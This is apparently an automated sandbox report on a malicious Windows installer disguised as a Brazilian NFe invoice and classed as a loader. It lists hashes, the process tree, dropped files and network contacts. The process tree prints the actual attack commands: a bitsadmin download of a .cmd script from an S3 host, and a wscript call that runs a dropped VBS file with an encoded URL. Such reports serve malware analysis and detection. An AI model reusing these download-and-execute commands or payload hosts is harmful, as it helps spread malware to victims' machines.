download: | NFe-332595261652LBLX201MNSZSN28161.msi |
Full analysis: | https://app.any.run/tasks/6f2c9902-88d8-4da3-a654-8c3b928ec112 |
Verdict: | Malicious activity |
Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
Analysis date: | August 13, 2019, 15:39:41 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-msi |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, MSI Installer, Title: Installation Database, Keywords: Installer, MSI, Database, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Dec 11 11:47:44 2009, Number of Pages: 200, Security: 0, Code page: 1252, Revision Number: {56A89770-E8FA-49A3-823D-A532438B4E6F}, Number of Words: 10, Subject: Install, Author: Free Java Software, Last Saved By: Chrome, Name of Creating Application: Advanced Installer 12.2.1 build 64247, Template: ;1033 |
MD5: | C96A76F3A8B0600535C4B9A99FE49F1D |
SHA1: | 19B55A192F8E8BE23072B585DA79BF34F9ACA560 |
SHA256: | F6B387087D3FFB2901A310572334EC0039BAFF9CFCD4D85AAE15743A54FEA113 |
SSDEEP: | 3072:flQRC9pM3DGY5ADwgz88ereWn/7w05g0+McB3RUN46ILJ9+ZB5yOan8R:flQSM3DGY5AC8er1nzTTrXR |
.msi | | | Microsoft Windows Installer (88.6) |
---|---|---|
.mst | | | Windows SDK Setup Transform Script (10) |
.msi | | | Microsoft Installer (100) |
Template: | ;1033 |
---|---|
Software: | Advanced Installer 12.2.1 build 64247 |
LastModifiedBy: | Chrome |
Author: | Free Java Software |
Subject: | Install |
Words: | 10 |
RevisionNumber: | {56A89770-E8FA-49A3-823D-A532438B4E6F} |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Pages: | 200 |
ModifyDate: | 2009:12:11 11:47:44 |
CreateDate: | 2009:12:11 11:47:44 |
LastPrinted: | 2009:12:11 11:47:44 |
Comments: | - |
Keywords: | Installer, MSI, Database |
Title: | Installation Database |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2900 | "C:\Windows\System32\msiexec.exe" /i "C:\Users\admin\Desktop\NFe-332595261652LBLX201MNSZSN28161.msi" | C:\Windows\System32\msiexec.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
2860 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | services.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
2444 | C:\Windows\system32\MsiExec.exe -Embedding 9F24321B53590E57DD54CFB79CB6962E | C:\Windows\system32\MsiExec.exe | — | msiexec.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
2732 | "C:\Windows\System32\cmd.exe" /C bitsadmin.exe /transfer "TGCTOQCBJUEFC" https://pumslins.s3.amazonaws.com/1308104651.cmd C:\Users\admin\COLVAGHKYQEEL.cmd | C:\Windows\System32\cmd.exe | — | MsiExec.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
4092 | bitsadmin.exe /transfer "TGCTOQCBJUEFC" https://pumslins.s3.amazonaws.com/1308104651.cmd C:\Users\admin\COLVAGHKYQEEL.cmd | C:\Windows\system32\bitsadmin.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: BITS administration utility Exit code: 0 Version: 7.5.7600.16385 (win7_rtm.090713-1255) | ||||
3628 | cmd /c ""C:\Users\admin\COLVAGHKYQEEL.cmd" " | C:\Windows\system32\cmd.exe | — | MsiExec.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2552 | ping 127.0.0.1 -n 1 | C:\Windows\system32\PING.EXE | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2700 | wscript //Nologo "C:\ProgramData\windows\YYYqF\admin.vbs" AS111 https://poolgta.live/bibacham/aHR0cHM6Ly9kb2NzeDAxLnMzLXNhLWVhc3QtMS5hbWF6b25hd3MuY29tL2p1cGl0bG8xOHQucG5nJm5vLXBvd2Vy | C:\Windows\system32\wscript.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
640 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3592 | "C:\Windows\System32\WScript.exe" "C:\ProgramData\windows\YYYqF\admin.vbs" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2860 | msiexec.exe | C:\Windows\Installer\MSICE37.tmp | — | |
MD5:— | SHA256:— | |||
2860 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DFB33DAE4C32BD7006.TMP | — | |
MD5:— | SHA256:— | |||
2860 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DFAB3C1918184DB4C5.TMP | — | |
MD5:— | SHA256:— | |||
2196 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LH043OAM\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
3628 | cmd.exe | C:\ProgramData\windows\YYYqF\admin.vbs | text | |
MD5:F953D0906D26CF266538AA770AEC8EFB | SHA256:5741535D8E3DFE882281EC7DA43F80E2ED8BE280A04B0F89DAE9BAA89BC858E5 | |||
2196 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
2860 | msiexec.exe | C:\Windows\Installer\36cbd5.msi | executable | |
MD5:C96A76F3A8B0600535C4B9A99FE49F1D | SHA256:F6B387087D3FFB2901A310572334EC0039BAFF9CFCD4D85AAE15743A54FEA113 | |||
2860 | msiexec.exe | C:\Config.Msi\36cbd8.rbs | binary | |
MD5:F6764698EA6278702AB034CA54B041EA | SHA256:9C4C138740E224BF2F47213EDCC17D83BA1794AFF1027199C7C9B2AC148217E7 | |||
2860 | msiexec.exe | C:\Windows\Installer\MSICEF3.tmp | binary | |
MD5:AC018B7AE20D4FECAA1D70F725834CC8 | SHA256:22F9C2C28C0D35901DCB81959BBFA5AA4A3F4B0ADA28592679F39F72C1562E56 | |||
3648 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat | dat | |
MD5:5092C5FDAE78B553BB40C5B4DAC0EF77 | SHA256:A49E890F0304B24C6C7B1E284F229898599683E87AAD1755F6568DD70C0274E8 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | 72.247.178.16:80 | http://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D | NL | der | 1.37 Kb | whitelisted |
2196 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2196 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3240 | gup.exe | 37.59.28.236:443 | notepad-plus-plus.org | OVH SAS | FR | whitelisted |
— | — | 52.216.165.83:443 | pumslins.s3.amazonaws.com | Amazon.com, Inc. | US | unknown |
2700 | wscript.exe | 34.239.126.71:443 | poolgta.live | Amazon.com, Inc. | US | unknown |
3648 | iexplore.exe | 186.192.81.31:443 | g1.globo.com | Globo Comunicação e Participaçoes SA | BR | unknown |
— | — | 72.247.178.16:80 | isrg.trustid.ocsp.identrust.com | Akamai International B.V. | NL | whitelisted |
3648 | iexplore.exe | 172.217.16.130:443 | www.googletagservices.com | Google Inc. | US | whitelisted |
3648 | iexplore.exe | 186.192.91.5:443 | s.glbimg.com | Globo Comunicação e Participaçoes SA | BR | unknown |
3648 | iexplore.exe | 2.19.43.224:443 | sb.scorecardresearch.com | Akamai International B.V. | — | whitelisted |
3648 | iexplore.exe | 186.192.91.9:443 | s2.glbimg.com | Globo Comunicação e Participaçoes SA | BR | unknown |
Domain | IP | Reputation |
---|---|---|
pumslins.s3.amazonaws.com |
| shared |
poolgta.live |
| unknown |
edzz.la |
| unknown |
notepad-plus-plus.org |
| whitelisted |
isrg.trustid.ocsp.identrust.com |
| whitelisted |
www.bing.com |
| whitelisted |
gl.globo.com |
| unknown |
g1.globo.com |
| unknown |
s3.glbimg.com |
| unknown |
www.googletagservices.com |
| whitelisted |
Process | Message |
---|---|
notepad++.exe | VerifyLibrary: certificate revocation checking is disabl |
notepad++.exe | VerifyLibrary: certificate revocation checking is disabled
|
notepad++.exe | 42C4C5846BB675C74E2B2C90C69AB44366401093
|